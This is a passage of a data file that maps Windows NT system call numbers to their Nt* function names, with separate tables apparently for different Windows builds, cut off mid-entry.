\"NtQuerySystemInformation\", \"55\": \"NtOpenSection\", \"56\": \"NtQueryTimer\", \"57\": \"NtFsControlFile\", \"58\": \"NtWriteVirtualMemory\", \"59\": \"NtCloseObjectAuditAlarm\", \"60\": \"NtDuplicateObject\", \"61\": \"NtQueryAttributesFile\", \"62\": \"NtClearEvent\", \"63\": \"NtReadVirtualMemory\", \"64\": \"NtOpenEvent\", \"65\": \"NtAdjustPrivilegesToken\", \"66\": \"NtDuplicateToken\", \"67\": \"NtContinue\", \"68\": \"NtQueryDefaultUILanguage\", \"69\": \"NtQueueApcThread\", \"70\": \"NtYieldExecution\", \"71\": \"NtAddAtom\", \"72\": \"NtCreateEvent\", \"73\": \"NtQueryVolumeInformationFile\", \"74\": \"NtCreateSection\", \"75\": \"NtFlushBuffersFile\", \"76\": \"NtApphelpCacheControl\", \"77\": \"NtCreateProcessEx\", \"78\": \"NtCreateThread\", \"79\": \"NtIsProcessInJob\", \"80\": \"NtProtectVirtualMemory\", \"81\": \"NtQuerySection\", \"82\": \"NtResumeThread\", \"83\": \"NtTerminateThread\", \"84\": \"NtReadRequestData\", \"85\": \"NtCreateFile\", \"86\": \"NtQueryEvent\", \"87\": \"NtWriteRequestData\", \"88\": \"NtOpenDirectoryObject\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"90\": \"NtQuerySystemTime\", \"91\": \"NtWaitForMultipleObjects\", \"92\": \"NtSetInformationObject\", \"93\": \"NtCancelIoFile\", \"94\": \"NtTraceEvent\", \"95\": \"NtPowerInformation\", \"96\": \"NtSetValueKey\", \"97\": \"NtCancelTimer\", \"98\": \"NtSetTimer\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAddAtomEx\", \"104\": \"NtAddBootEntry\", \"105\": \"NtAddDriverEntry\", \"106\": \"NtAdjustGroupsToken\", \"107\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"108\": \"NtAlertResumeThread\", \"109\": \"NtAlertThread\", \"110\": \"NtAlertThreadByThreadId\", \"111\": \"NtAllocateLocallyUniqueId\", \"112\": \"NtAllocateReserveObject\", \"113\": \"NtAllocateUserPhysicalPages\", \"114\": \"NtAllocateUuids\", \"115\": \"NtAlpcAcceptConnectPort\", \"116\": \"NtAlpcCancelMessage\", \"117\": \"NtAlpcConnectPort\", \"118\": \"NtAlpcConnectPortEx\", \"119\": \"NtAlpcCreatePort\", \"120\": \"NtAlpcCreatePortSection\", \"121\": \"NtAlpcCreateResourceReserve\", \"122\": \"NtAlpcCreateSectionView\", \"123\": \"NtAlpcCreateSecurityContext\", \"124\": \"NtAlpcDeletePortSection\", \"125\": \"NtAlpcDeleteResourceReserve\", \"126\": \"NtAlpcDeleteSectionView\", \"127\": \"NtAlpcDeleteSecurityContext\", \"128\": \"NtAlpcDisconnectPort\", \"129\": \"NtAlpcImpersonateClientContainerOfPort\", \"130\": \"NtAlpcImpersonateClientOfPort\", \"131\": \"NtAlpcOpenSenderProcess\", \"132\": \"NtAlpcOpenSenderThread\", \"133\": \"NtAlpcQueryInformation\", \"134\": \"NtAlpcQueryInformationMessage\", \"135\": \"NtAlpcRevokeSecurityContext\", \"136\": \"NtAlpcSendWaitReceivePort\", \"137\": \"NtAlpcSetInformation\", \"138\": \"NtAreMappedFilesTheSame\", \"139\": \"NtAssignProcessToJobObject\", \"140\": \"NtAssociateWaitCompletionPacket\", \"141\": \"NtCancelIoFileEx\", \"142\": \"NtCancelSynchronousIoFile\", \"143\": \"NtCancelTimer2\", \"144\": \"NtCancelWaitCompletionPacket\", \"145\": \"NtCommitComplete\", \"146\": \"NtCommitEnlistment\", \"147\": \"NtCommitTransaction\", \"148\": \"NtCompactKeys\", \"149\": \"NtCompareObjects\", \"150\": \"NtCompareTokens\", \"151\": \"NtCompleteConnectPort\", \"152\": \"NtCompressKey\", \"153\": \"NtConnectPort\", \"154\": \"NtCreateDebugObject\", \"155\": \"NtCreateDirectoryObject\", \"156\": \"NtCreateDirectoryObjectEx\", \"157\": \"NtCreateEnlistment\", \"158\": \"NtCreateEventPair\", \"159\": \"NtCreateIRTimer\", \"160\": \"NtCreateIoCompletion\", \"161\": \"NtCreateJobObject\", \"162\": \"NtCreateJobSet\", \"163\": \"NtCreateKeyTransacted\", \"164\": \"NtCreateKeyedEvent\", \"165\": \"NtCreateLowBoxToken\", \"166\": \"NtCreateMailslotFile\", \"167\": \"NtCreateMutant\", \"168\": \"NtCreateNamedPipeFile\", \"169\": \"NtCreatePagingFile\", \"170\": \"NtCreatePartition\", \"171\": \"NtCreatePort\", \"172\": \"NtCreatePrivateNamespace\", \"173\": \"NtCreateProcess\", \"174\": \"NtCreateProfile\", \"175\": \"NtCreateProfileEx\", \"176\": \"NtCreateResourceManager\", \"177\": \"NtCreateSemaphore\", \"178\": \"NtCreateSymbolicLinkObject\", \"179\": \"NtCreateThreadEx\", \"180\": \"NtCreateTimer\", \"181\": \"NtCreateTimer2\", \"182\": \"NtCreateToken\", \"183\": \"NtCreateTokenEx\", \"184\": \"NtCreateTransaction\", \"185\": \"NtCreateTransactionManager\", \"186\": \"NtCreateUserProcess\", \"187\": \"NtCreateWaitCompletionPacket\", \"188\": \"NtCreateWaitablePort\", \"189\": \"NtCreateWnfStateName\", \"190\": \"NtCreateWorkerFactory\", \"191\": \"NtDebugActiveProcess\", \"192\": \"NtDebugContinue\", \"193\": \"NtDeleteAtom\", \"194\": \"NtDeleteBootEntry\", \"195\": \"NtDeleteDriverEntry\", \"196\": \"NtDeleteFile\", \"197\": \"NtDeleteKey\", \"198\": \"NtDeleteObjectAuditAlarm\", \"199\": \"NtDeletePrivateNamespace\", \"200\": \"NtDeleteValueKey\", \"201\": \"NtDeleteWnfStateData\", \"202\": \"NtDeleteWnfStateName\", \"203\": \"NtDisableLastKnownGood\", \"204\": \"NtDisplayString\", \"205\": \"NtDrawText\", \"206\": \"NtEnableLastKnownGood\", \"207\": \"NtEnumerateBootEntries\", \"208\": \"NtEnumerateDriverEntries\", \"209\": \"NtEnumerateSystemEnvironmentValuesEx\", \"210\": \"NtEnumerateTransactionObject\", \"211\": \"NtExtendSection\", \"212\": \"NtFilterBootOption\", \"213\": \"NtFilterToken\", \"214\": \"NtFilterTokenEx\", \"215\": \"NtFlushBuffersFileEx\", \"216\": \"NtFlushInstallUILanguage\", \"217\": \"NtFlushInstructionCache\", \"218\": \"NtFlushKey\", \"219\": \"NtFlushProcessWriteBuffers\", \"220\": \"NtFlushVirtualMemory\", \"221\": \"NtFlushWriteBuffer\", \"222\": \"NtFreeUserPhysicalPages\", \"223\": \"NtFreezeRegistry\", \"224\": \"NtFreezeTransactions\", \"225\": \"NtGetCachedSigningLevel\", \"226\": \"NtGetCompleteWnfStateSubscription\", \"227\": \"NtGetContextThread\", \"228\": \"NtGetCurrentProcessorNumber\", \"229\": \"NtGetCurrentProcessorNumberEx\", \"230\": \"NtGetDevicePowerState\", \"231\": \"NtGetMUIRegistryInfo\", \"232\": \"NtGetNextProcess\", \"233\": \"NtGetNextThread\", \"234\": \"NtGetNlsSectionPtr\", \"235\": \"NtGetNotificationResourceManager\", \"236\": \"NtGetWriteWatch\", \"237\": \"NtImpersonateAnonymousToken\", \"238\": \"NtImpersonateThread\", \"239\": \"NtInitializeNlsFiles\", \"240\": \"NtInitializeRegistry\", \"241\": \"NtInitiatePowerAction\", \"242\": \"NtIsSystemResumeAutomatic\", \"243\": \"NtIsUILanguageComitted\", \"244\": \"NtListenPort\", \"245\": \"NtLoadDriver\", \"246\": \"NtLoadKey\", \"247\": \"NtLoadKey2\", \"248\": \"NtLoadKeyEx\", \"249\": \"NtLockFile\", \"250\": \"NtLockProductActivationKeys\", \"251\": \"NtLockRegistryKey\", \"252\": \"NtLockVirtualMemory\", \"253\": \"NtMakePermanentObject\", \"254\": \"NtMakeTemporaryObject\", \"255\": \"NtManagePartition\", \"256\": \"NtMapCMFModule\", \"257\": \"NtMapUserPhysicalPages\", \"258\": \"NtModifyBootEntry\", \"259\": \"NtModifyDriverEntry\", \"260\": \"NtNotifyChangeDirectoryFile\", \"261\": \"NtNotifyChangeKey\", \"262\": \"NtNotifyChangeMultipleKeys\", \"263\": \"NtNotifyChangeSession\", \"264\": \"NtOpenEnlistment\", \"265\": \"NtOpenEventPair\", \"266\": \"NtOpenIoCompletion\", \"267\": \"NtOpenJobObject\", \"268\": \"NtOpenKeyEx\", \"269\": \"NtOpenKeyTransacted\", \"270\": \"NtOpenKeyTransactedEx\", \"271\": \"NtOpenKeyedEvent\", \"272\": \"NtOpenMutant\", \"273\": \"NtOpenObjectAuditAlarm\", \"274\": \"NtOpenPartition\", \"275\": \"NtOpenPrivateNamespace\", \"276\": \"NtOpenProcessToken\", \"277\": \"NtOpenResourceManager\", \"278\": \"NtOpenSemaphore\", \"279\": \"NtOpenSession\", \"280\": \"NtOpenSymbolicLinkObject\", \"281\": \"NtOpenThread\", \"282\": \"NtOpenTimer\", \"283\": \"NtOpenTransaction\", \"284\": \"NtOpenTransactionManager\", \"285\": \"NtPlugPlayControl\", \"286\": \"NtPrePrepareComplete\", \"287\": \"NtPrePrepareEnlistment\", \"288\": \"NtPrepareComplete\", \"289\": \"NtPrepareEnlistment\", \"290\": \"NtPrivilegeCheck\", \"291\": \"NtPrivilegeObjectAuditAlarm\", \"292\": \"NtPrivilegedServiceAuditAlarm\", \"293\": \"NtPropagationComplete\", \"294\": \"NtPropagationFailed\", \"295\": \"NtPulseEvent\", \"296\": \"NtQueryBootEntryOrder\", \"297\": \"NtQueryBootOptions\", \"298\": \"NtQueryDebugFilterState\", \"299\": \"NtQueryDirectoryObject\", \"300\": \"NtQueryDriverEntryOrder\", \"301\": \"NtQueryEaFile\", \"302\": \"NtQueryFullAttributesFile\", \"303\": \"NtQueryInformationAtom\", \"304\": \"NtQueryInformationEnlistment\", \"305\": \"NtQueryInformationJobObject\", \"306\": \"NtQueryInformationPort\", \"307\": \"NtQueryInformationResourceManager\", \"308\": \"NtQueryInformationTransaction\", \"309\": \"NtQueryInformationTransactionManager\", \"310\": \"NtQueryInformationWorkerFactory\", \"311\": \"NtQueryInstallUILanguage\", \"312\": \"NtQueryIntervalProfile\", \"313\": \"NtQueryIoCompletion\", \"314\": \"NtQueryLicenseValue\", \"315\": \"NtQueryMultipleValueKey\", \"316\": \"NtQueryMutant\", \"317\": \"NtQueryOpenSubKeys\", \"318\": \"NtQueryOpenSubKeysEx\", \"319\": \"NtQueryPortInformationProcess\", \"320\": \"NtQueryQuotaInformationFile\", \"321\": \"NtQuerySecurityAttributesToken\", \"322\": \"NtQuerySecurityObject\", \"323\": \"NtQuerySemaphore\", \"324\": \"NtQuerySymbolicLinkObject\", \"325\": \"NtQuerySystemEnvironmentValue\", \"326\": \"NtQuerySystemEnvironmentValueEx\", \"327\": \"NtQuerySystemInformationEx\", \"328\": \"NtQueryTimerResolution\", \"329\": \"NtQueryWnfStateData\", \"330\": \"NtQueryWnfStateNameInformation\", \"331\": \"NtQueueApcThreadEx\", \"332\": \"NtRaiseException\", \"333\": \"NtRaiseHardError\", \"334\": \"NtReadOnlyEnlistment\", \"335\": \"NtRecoverEnlistment\", \"336\": \"NtRecoverResourceManager\", \"337\": \"NtRecoverTransactionManager\", \"338\": \"NtRegisterProtocolAddressInformation\", \"339\": \"NtRegisterThreadTerminatePort\", \"340\": \"NtReleaseKeyedEvent\", \"341\": \"NtReleaseWorkerFactoryWorker\", \"342\": \"NtRemoveIoCompletionEx\", \"343\": \"NtRemoveProcessDebug\", \"344\": \"NtRenameKey\", \"345\": \"NtRenameTransactionManager\", \"346\": \"NtReplaceKey\", \"347\": \"NtReplacePartitionUnit\", \"348\": \"NtReplyWaitReplyPort\", \"349\": \"NtRequestPort\", \"350\": \"NtResetEvent\", \"351\": \"NtResetWriteWatch\", \"352\": \"NtRestoreKey\", \"353\": \"NtResumeProcess\", \"354\": \"NtRevertContainerImpersonation\", \"355\": \"NtRollbackComplete\", \"356\": \"NtRollbackEnlistment\", \"357\": \"NtRollbackTransaction\", \"358\": \"NtRollforwardTransactionManager\", \"359\": \"NtSaveKey\", \"360\": \"NtSaveKeyEx\", \"361\": \"NtSaveMergedKeys\", \"362\": \"NtSecureConnectPort\", \"363\": \"NtSerializeBoot\", \"364\": \"NtSetBootEntryOrder\", \"365\": \"NtSetBootOptions\", \"366\": \"NtSetCachedSigningLevel\", \"367\": \"NtSetContextThread\", \"368\": \"NtSetDebugFilterState\", \"369\": \"NtSetDefaultHardErrorPort\", \"370\": \"NtSetDefaultLocale\", \"371\": \"NtSetDefaultUILanguage\", \"372\": \"NtSetDriverEntryOrder\", \"373\": \"NtSetEaFile\", \"374\": \"NtSetHighEventPair\", \"375\": \"NtSetHighWaitLowEventPair\", \"376\": \"NtSetIRTimer\", \"377\": \"NtSetInformationDebugObject\", \"378\": \"NtSetInformationEnlistment\", \"379\": \"NtSetInformationJobObject\", \"380\": \"NtSetInformationKey\", \"381\": \"NtSetInformationResourceManager\", \"382\": \"NtSetInformationSymbolicLink\", \"383\": \"NtSetInformationToken\", \"384\": \"NtSetInformationTransaction\", \"385\": \"NtSetInformationTransactionManager\", \"386\": \"NtSetInformationVirtualMemory\", \"387\": \"NtSetInformationWorkerFactory\", \"388\": \"NtSetIntervalProfile\", \"389\": \"NtSetIoCompletion\", \"390\": \"NtSetIoCompletionEx\", \"391\": \"NtSetLdtEntries\", \"392\": \"NtSetLowEventPair\", \"393\": \"NtSetLowWaitHighEventPair\", \"394\": \"NtSetQuotaInformationFile\", \"395\": \"NtSetSecurityObject\", \"396\": \"NtSetSystemEnvironmentValue\", \"397\": \"NtSetSystemEnvironmentValueEx\", \"398\": \"NtSetSystemInformation\", \"399\": \"NtSetSystemPowerState\", \"400\": \"NtSetSystemTime\", \"401\": \"NtSetThreadExecutionState\", \"402\": \"NtSetTimer2\", \"403\": \"NtSetTimerEx\", \"404\": \"NtSetTimerResolution\", \"405\": \"NtSetUuidSeed\", \"406\": \"NtSetVolumeInformationFile\", \"407\": \"NtSetWnfProcessNotificationEvent\", \"408\": \"NtShutdownSystem\", \"409\": \"NtShutdownWorkerFactory\", \"410\": \"NtSignalAndWaitForSingleObject\", \"411\": \"NtSinglePhaseReject\", \"412\": \"NtStartProfile\", \"413\": \"NtStopProfile\", \"414\": \"NtSubscribeWnfStateChange\", \"415\": \"NtSuspendProcess\", \"416\": \"NtSuspendThread\", \"417\": \"NtSystemDebugControl\", \"418\": \"NtTerminateJobObject\", \"419\": \"NtTestAlert\", \"420\": \"NtThawRegistry\", \"421\": \"NtThawTransactions\", \"422\": \"NtTraceControl\", \"423\": \"NtTranslateFilePath\", \"424\": \"NtUmsThreadYield\", \"425\": \"NtUnloadDriver\", \"426\": \"NtUnloadKey\", \"427\": \"NtUnloadKey2\", \"428\": \"NtUnloadKeyEx\", \"429\": \"NtUnlockFile\", \"430\": \"NtUnlockVirtualMemory\", \"431\": \"NtUnmapViewOfSectionEx\", \"432\": \"NtUnsubscribeWnfStateChange\", \"433\": \"NtUpdateWnfStateData\", \"434\": \"NtVdmControl\", \"435\": \"NtWaitForAlertByThreadId\", \"436\": \"NtWaitForDebugEvent\", \"437\": \"NtWaitForKeyedEvent\", \"438\": \"NtWaitForWorkViaWorkerFactory\", \"439\": \"NtWaitHighEventPair\", \"440\": \"NtWaitLowEventPair\"}, \"1511\": {\"0\": \"NtAccessCheck\", \"1\": \"NtWorkerFactoryWorkerReady\", \"2\": \"NtAcceptConnectPort\", \"3\": \"NtMapUserPhysicalPagesScatter\", \"4\": \"NtWaitForSingleObject\", \"5\": \"NtCallbackReturn\", \"6\": \"NtReadFile\", \"7\": \"NtDeviceIoControlFile\", \"8\": \"NtWriteFile\", \"9\": \"NtRemoveIoCompletion\", \"10\": \"NtReleaseSemaphore\", \"11\": \"NtReplyWaitReceivePort\", \"12\": \"NtReplyPort\", \"13\": \"NtSetInformationThread\", \"14\": \"NtSetEvent\", \"15\": \"NtClose\", \"16\": \"NtQueryObject\", \"17\": \"NtQueryInformationFile\", \"18\": \"NtOpenKey\", \"19\": \"NtEnumerateValueKey\", \"20\": \"NtFindAtom\", \"21\": \"NtQueryDefaultLocale\", \"22\": \"NtQueryKey\", \"23\": \"NtQueryValueKey\", \"24\": \"NtAllocateVirtualMemory\", \"25\": \"NtQueryInformationProcess\", \"26\": \"NtWaitForMultipleObjects32\", \"27\": \"NtWriteFileGather\", \"28\": \"NtSetInformationProcess\", \"29\": \"NtCreateKey\", \"30\": \"NtFreeVirtualMemory\", \"31\": \"NtImpersonateClientOfPort\", \"32\": \"NtReleaseMutant\", \"33\": \"NtQueryInformationToken\", \"34\": \"NtRequestWaitReplyPort\", \"35\": \"NtQueryVirtualMemory\", \"36\": \"NtOpenThreadToken\", \"37\": \"NtQueryInformationThread\", \"38\": \"NtOpenProcess\", \"39\": \"NtSetInformationFile\", \"40\": \"NtMapViewOfSection\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"42\": \"NtUnmapViewOfSection\", \"43\": \"NtReplyWaitReceivePortEx\", \"44\": \"NtTerminateProcess\", \"45\": \"NtSetEventBoostPriority\", \"46\": \"NtReadFileScatter\", \"47\": \"NtOpenThreadTokenEx\", \"48\": \"NtOpenProcessTokenEx\", \"49\": \"NtQueryPerformanceCounter\", \"50\": \"NtEnumerateKey\", \"51\": \"NtOpenFile\", \"52\": \"NtDelayExecution\", \"53\": \"NtQueryDirectoryFile\", \"54\": \"NtQuerySystemInformation\", \"55\": \"NtOpenSection\", \"56\": \"NtQueryTimer\", \"57\": \"NtFsControlFile\", \"58\": \"NtWriteVirtualMemory\", \"59\": \"NtCloseObjectAuditAlarm\", \"60\": \"NtDuplicateObject\", \"61\": \"NtQueryAttributesFile\", \"62\": \"NtClearEvent\", \"63\": \"NtReadVirtualMemory\", \"64\": \"NtOpenEvent\", \"65\": \"NtAdjustPrivilegesToken\", \"66\": \"NtDuplicateToken\", \"67\": \"NtContinue\", \"68\": \"NtQueryDefaultUILanguage\", \"69\": \"NtQueueApcThread\", \"70\": \"NtYieldExecution\", \"71\": \"NtAddAtom\", \"72\": \"NtCreateEvent\", \"73\": \"NtQueryVolumeInformationFile\", \"74\": \"NtCreateSection\", \"75\": \"NtFlushBuffersFile\", \"76\": \"NtApphelpCacheControl\", \"77\": \"NtCreateProcessEx\", \"78\": \"NtCreateThread\", \"79\": \"NtIsProcessInJob\", \"80\": \"NtProtectVirtualMemory\", \"81\": \"NtQuerySection\", \"82\": \"NtResumeThread\", \"83\": \"NtTerminateThread\", \"84\": \"NtReadRequestData\", \"85\": \"NtCreateFile\", \"86\": \"NtQueryEvent\", \"87\": \"NtWriteRequestData\", \"88\": \"NtOpenDirectoryObject\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"90\": \"NtQuerySystemTime\", \"91\": \"NtWaitForMultipleObjects\", \"92\": \"NtSetInformationObject\", \"93\": \"NtCancelIoFile\", \"94\": \"NtTraceEvent\", \"95\": \"NtPowerInformation\", \"96\": \"NtSetValueKey\", \"97\": \"NtCancelTimer\", \"98\": \"NtSetTimer\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAddAtomEx\", \"104\": \"NtAddBootEntry\", \"105\": \"NtAddDriverEntry\", \"106\": \"NtAdjustGroupsToken\", \"107\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"108\": \"NtAlertResumeThread\", \"109\": \"NtAlertThread\", \"110\": \"NtAlertThreadByThreadId\", \"111\": \"NtAllocateLocallyUniqueId\", \"112\": \"NtAllocateReserveObject\", \"113\": \"NtAllocateUserPhysicalPages\", \"114\": \"NtAllocateUuids\", \"115\": \"NtAlpcAcceptConnectPort\", \"116\": \"NtAlpcCancelMessage\", \"117\": \"NtAlpcConnectPort\", \"118\": \"NtAlpcConnectPortEx\", \"119\": \"NtAlpcCreatePort\", \"120\": \"NtAlpcCreatePortSection\", \"121\": \"NtAlpcCreateResourceReserve\", \"122\": \"NtAlpcCreateSectionView\", \"123\": \"NtAlpcCreateSecurityContext\", \"124\": \"NtAlpcDeletePortSection\", \"125\": \"NtAlpcDeleteResourceReserve\", \"126\": \"NtAlpcDeleteSectionView\", \"127\": \"NtAlpcDeleteSecurityContext\", \"128\": \"NtAlpcDisconnectPort\", \"129\": \"NtAlpcImpersonateClientContainerOfPort\", \"130\": \"NtAlpcImpersonateClientOfPort\", \"131\": \"NtAlpcOpenSenderProcess\", \"132\": \"NtAlpcOpenSenderThread\", \"133\": \"NtAlpcQueryInformation\", \"134\": \"NtAlpcQueryInformationMessage\", \"135\": \"NtAlpcRevokeSecurityContext\", \"136\": \"NtAlpcSendWaitReceivePort\", \"137\": \"NtAlpcSetInformation\", \"138\": \"NtAreMappedFilesTheSame\", \"139\": \"NtAssignProcessToJobObject\", \"140\": \"NtAssociateWaitCompletionPacket\", \"141\": \"NtCancelIoFileEx\", \"142\": \"NtCancelSynchronousIoFile\", \"143\": \"NtCancelTimer2\", \"144\": \"NtCancelWaitCompletionPacket\", \"145\": \"NtCommitComplete\", \"146\": \"NtCommitEnlistment\", \"147\": \"NtCommitTransaction\", \"148\": \"NtCompactKeys\", \"149\": \"NtCompareObjects\", \"150\": \"NtCompareTokens\", \"151\": \"NtCompleteConnectPort\", \"152\": \"NtCompressKey\", \"153\": \"NtConnectPort\", \"154\": \"NtCreateDebugObject\", \"155\": \"NtCreateDirectoryObject\", \"156\": \"NtCreateDirectoryObjectEx\", \"157\": \"NtCreateEnclave\", \"158\": \"NtCreateEnlistment\", \"159\": \"NtCreateEventPair\", \"160\": \"NtCreateIRTimer\", \"161\": \"NtCreateIoCompletion\", \"162\": \"NtCreateJobObject\", \"163\": \"NtCreateJobSet\", \"164\": \"NtCreateKeyTransacted\", \"165\": \"NtCreateKeyedEvent\", \"166\": \"NtCreateLowBoxToken\", \"167\": \"NtCreateMailslotFile\", \"168\": \"NtCreateMutant\", \"169\": \"NtCreateNamedPipeFile\", \"170\": \"NtCreatePagingFile\", \"171\": \"NtCreatePartition\", \"172\": \"NtCreatePort\", \"173\": \"NtCreatePrivateNamespace\", \"174\": \"NtCreateProcess\", \"175\": \"NtCreateProfile\", \"176\": \"NtCreateProfileEx\", \"177\": \"NtCreateResourceManager\", \"178\": \"NtCreateSemaphore\", \"179\": \"NtCreateSymbolicLinkObject\", \"180\": \"NtCreateThreadEx\", \"181\": \"NtCreateTimer\", \"182\": \"NtCreateTimer2\", \"183\": \"NtCreateToken\", \"184\": \"NtCreateTokenEx\", \"185\": \"NtCreateTransaction\", \"186\": \"NtCreateTransactionManager\", \"187\": \"NtCreateUserProcess\", \"188\": \"NtCreateWaitCompletionPacket\", \"189\": \"NtCreateWaitablePort\", \"190\": \"NtCreateWnfStateName\", \"191\": \"NtCreateWorkerFactory\", \"192\": \"NtDebugActiveProcess\", \"193\": \"NtDebugContinue\", \"194\": \"NtDeleteAtom\", \"195\": \"NtDeleteBootEntry\", \"196\": \"NtDeleteDriverEntry\", \"197\": \"NtDeleteFile\", \"198\": \"NtDeleteKey\", \"199\": \"NtDeleteObjectAuditAlarm\", \"200\": \"NtDeletePrivateNamespace\", \"201\": \"NtDeleteValueKey\", \"202\": \"NtDeleteWnfStateData\", \"203\": \"NtDeleteWnfStateName\", \"204\": \"NtDisableLastKnownGood\", \"205\": \"NtDisplayString\", \"206\": \"NtDrawText\", \"207\": \"NtEnableLastKnownGood\", \"208\": \"NtEnumerateBootEntries\", \"209\": \"NtEnumerateDriverEntries\", \"210\": \"NtEnumerateSystemEnvironmentValuesEx\", \"211\": \"NtEnumerateTransactionObject\", \"212\": \"NtExtendSection\", \"213\": \"NtFilterBootOption\", \"214\": \"NtFilterToken\", \"215\": \"NtFilterTokenEx\", \"216\": \"NtFlushBuffersFileEx\", \"217\": \"NtFlushInstallUILanguage\", \"218\": \"NtFlushInstructionCache\", \"219\": \"NtFlushKey\", \"220\": \"NtFlushProcessWriteBuffers\", \"221\": \"NtFlushVirtualMemory\", \"222\": \"NtFlushWriteBuffer\", \"223\": \"NtFreeUserPhysicalPages\", \"224\": \"NtFreezeRegistry\", \"225\": \"NtFreezeTransactions\", \"226\": \"NtGetCachedSigningLevel\", \"227\": \"NtGetCompleteWnfStateSubscription\", \"228\": \"NtGetContextThread\", \"229\": \"NtGetCurrentProcessorNumber\", \"230\": \"NtGetCurrentProcessorNumberEx\", \"231\": \"NtGetDevicePowerState\", \"232\": \"NtGetMUIRegistryInfo\", \"233\": \"NtGetNextProcess\", \"234\": \"NtGetNextThread\", \"235\": \"NtGetNlsSectionPtr\", \"236\": \"NtGetNotificationResourceManager\", \"237\": \"NtGetWriteWatch\", \"238\": \"NtImpersonateAnonymousToken\", \"239\": \"NtImpersonateThread\", \"240\": \"NtInitializeEnclave\", \"241\": \"NtInitializeNlsFiles\", \"242\": \"NtInitializeRegistry\", \"243\": \"NtInitiatePowerAction\", \"244\": \"NtIsSystemResumeAutomatic\", \"245\": \"NtIsUILanguageComitted\", \"246\": \"NtListenPort\", \"247\": \"NtLoadDriver\", \"248\": \"NtLoadEnclaveData\", \"249\": \"NtLoadKey\", \"250\": \"NtLoadKey2\", \"251\": \"NtLoadKeyEx\", \"252\": \"NtLockFile\", \"253\": \"NtLockProductActivationKeys\", \"254\": \"NtLockRegistryKey\", \"255\": \"NtLockVirtualMemory\", \"256\": \"NtMakePermanentObject\", \"257\": \"NtMakeTemporaryObject\", \"258\": \"NtManagePartition\", \"259\": \"NtMapCMFModule\", \"260\": \"NtMapUserPhysicalPages\", \"261\": \"NtModifyBootEntry\", \"262\": \"NtModifyDriverEntry\", \"263\": \"NtNotifyChangeDirectoryFile\", \"264\": \"NtNotifyChangeKey\", \"265\": \"NtNotifyChangeMultipleKeys\", \"266\": \"NtNotifyChangeSession\", \"267\": \"NtOpenEnlistment\", \"268\": \"NtOpenEventPair\", \"269\": \"NtOpenIoCompletion\", \"270\": \"NtOpenJobObject\", \"271\": \"NtOpenKeyEx\", \"272\": \"NtOpenKeyTransacted\", \"273\": \"NtOpenKeyTransactedEx\", \"274\": \"NtOpenKeyedEvent\", \"275\": \"NtOpenMutant\", \"276\": \"NtOpenObjectAuditAlarm\", \"277\": \"NtOpenPartition\", \"278\": \"NtOpenPrivateNamespace\", \"279\": \"NtOpenProcessToken\", \"280\": \"NtOpenResourceManager\", \"281\": \"NtOpenSemaphore\", \"282\": \"NtOpenSession\", \"283\": \"NtOpenSymbolicLinkObject\", \"284\": \"NtOpenThread\", \"285\": \"NtOpenTimer\", \"286\": \"NtOpenTransaction\", \"287\": \"NtOpenTransactionManager\", \"288\": \"NtPlugPlayControl\", \"289\": \"NtPrePrepareComplete\", \"290\": \"NtPrePrepareEnlistment\", \"291\": \"NtPrepareComplete\", \"292\": \"NtPrepareEnlistment\", \"293\": \"NtPrivilegeCheck\", \"294\": \"NtPrivilegeObjectAuditAlarm\", \"295\": \"NtPrivilegedServiceAuditAlarm\", \"296\": \"NtPropagationComplete\", \"297\": \"NtPropagationFailed\", \"298\": \"NtPulseEvent\", \"299\": \"NtQueryBootEntryOrder\", \"300\": \"NtQueryBootOptions\", \"301\": \"NtQueryDebugFilterState\", \"302\": \"NtQueryDirectoryObject\", \"303\": \"NtQueryDriverEntryOrder\", \"304\": \"NtQueryEaFile\", \"305\": \"NtQueryFullAttributesFile\", \"306\": \"NtQueryInformationAtom\", \"307\": \"NtQueryInformationEnlistment\", \"308\": \"NtQueryInformationJobObject\", \"309\": \"NtQueryInformationPort\", \"310\": \"NtQueryInformationResourceManager\", \"311\": \"NtQueryInformationTransaction\", \"312\": \"NtQueryInformationTransactionManager\", \"313\": \"NtQueryInformationWorkerFactory\", \"314\": \"NtQueryInstallUILanguage\", \"315\": \"NtQueryIntervalProfile\", \"316\": \"NtQueryIoCompletion\", \"317\": \"NtQueryLicenseValue\", \"318\": \"NtQueryMultipleValueKey\", \"319\": \"NtQueryMutant\", \"320\": \"NtQueryOpenSubKeys\", \"321\": \"NtQueryOpenSubKeysEx\", \"322\": \"NtQueryPortInformationProcess\", \"323\": \"NtQueryQuotaInformationFile\", \"324\": \"NtQuerySecurityAttributesToken\", \"325\": \"NtQuerySecurityObject\", \"326\": \"NtQuerySemaphore\", \"327\": \"NtQuerySymbolicLinkObject\", \"328\": \"NtQuerySystemEnvironmentValue\", \"329\": \"NtQuerySystemEnvironmentValueEx\", \"330\": \"NtQuerySystemInformationEx\", \"331\": \"NtQueryTimerResolution\", \"332\": \"NtQueryWnfStateData\", \"333\": \"NtQueryWnfStateNameInformation\", \"334\": \"NtQueueApcThreadEx\", \"335\": \"NtRaiseException\", \"336\": \"NtRaiseHardError\", \"337\": \"NtReadOnlyEnlistment\", \"338\": \"NtRecoverEnlistment\", \"339\": \"NtRecoverResourceManager\", \"340\": \"NtRecoverTransactionManager\", \"341\": \"NtRegisterProtocolAddressInformation\", \"342\": \"NtRegisterThreadTerminatePort\", \"343\": \"NtReleaseKeyedEvent\", \"344\": \"NtReleaseWorkerFactoryWorker\", \"345\": \"NtRemoveIoCompletionEx\", \"346\": \"NtRemoveProcessDebug\", \"347\": \"NtRenameKey\", \"348\": \"NtRenameTransactionManager\", \"349\": \"NtReplaceKey\", \"350\": \"NtReplacePartitionUnit\", \"351\": \"NtReplyWaitReplyPort\", \"352\": \"NtRequestPort\", \"353\": \"NtResetEvent\", \"354\": \"NtResetWriteWatch\", \"355\": \"NtRestoreKey\", \"356\": 